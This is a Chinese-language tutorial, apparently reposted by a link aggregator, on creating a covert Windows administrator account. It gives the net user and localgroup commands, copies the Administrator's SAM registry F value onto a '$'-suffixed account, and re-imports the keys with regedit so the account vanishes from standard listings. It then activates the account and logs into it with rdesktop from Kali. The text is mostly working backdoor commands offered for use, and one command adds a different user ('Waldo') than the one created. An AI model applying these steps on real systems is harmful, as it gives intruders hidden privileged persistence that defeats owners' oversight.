制作隐藏的管理员账户
source link: https://www.ascotbe.com/2019/01/14/MakeAHiddenAdministratorAccount/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
如何创建隐藏的administrator账户
创建管理员用户zhou
net user zhou 123456h /add
net localgroup administrators Waldo /add
添加超级隐藏管理员账户
net user Ascotb$ 123456 /add
net localgroup administrators Ascotb$ /add
制作注册列表
但在管理账户面板依然能够看见,下面要解决这个问题
在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下找 到新建的帐户Ascotb$
获取默认类型为0x3ef,将注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Ascotb$导出为1.reg
在注册表下能够找到对应类型名称的注册表项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF
右键将该键导出为2.reg
默认情况下,管理员帐户Administrator对应的注册表键值为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
同样,右键将该键导出为3.reg
将注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF下键F的值替换为
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4下键F的值,即2.reg中键F的值替换成3.reg中键F的值
替换注册列表
命令行删除特殊账户: net user Ascotb$ /del
导入reg文件:
regedit /s 1.reg
regedit /s 2.reg
隐藏账户制做完成,控制面板不存在帐户Ascotb$
通过net user无法列出该帐户
计算机管理-本地用户和组-用户也无法列出该帐户
但可通过如下方式查看: net user Ascotb$
命令窗口打开后,键入net user Ascotb$/active:yes。输完后按一下回车键看到“命令成功完成”信息即表明超级隐藏账户Ascotb$ 账户已启用
该账户只有两个方法发现一个是注册表一个是知道名字
连接隐藏账户
在Kali使用超级隐藏账户登录: rdesktop 127.0.0.1 -u Ascotb$ -p 123456
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK